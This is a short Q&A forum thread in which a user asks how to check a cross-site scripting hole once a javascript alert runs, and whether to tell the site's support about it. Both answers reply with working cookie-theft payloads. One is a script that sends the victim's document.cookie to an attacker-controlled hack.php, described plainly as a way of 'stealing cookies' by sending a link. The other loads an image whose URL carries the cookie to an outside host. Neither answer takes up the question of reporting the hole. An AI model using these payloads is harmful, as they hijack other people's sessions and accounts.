N
N
Nimor2012-01-19 12:35:08
Information Security
Nimor, 2012-01-19 12:35:08

How to check XSS vulnerability?

Running: javascript: alert('xss')

Dangerous? Is it worth writing to support or will they send me?

Answer the question

In order to leave comments, you need to log in

5 answer(s)
I
int03e, 2012-01-19
@int03e

Is it done in a GET request? We substitute instead of an alert

<script>
document.location="http://yoursite.com/hack.php?cookie=" + document.cookie;document.location="http://www.site.com"
</script>

Where hack.php is our simple script for saving cookies. Sending a link, stealing cookies.

[
[email protected]><e, 2012-01-19
@barmaley_exe

If you have alert('xss') executed, then some

var t=new Image();t.src='http://google.com/sniffer/?'+document.cookie;
Must be executed.

Didn't find what you were looking for?

Ask your question

Ask a Question

731 491 924 answers to any question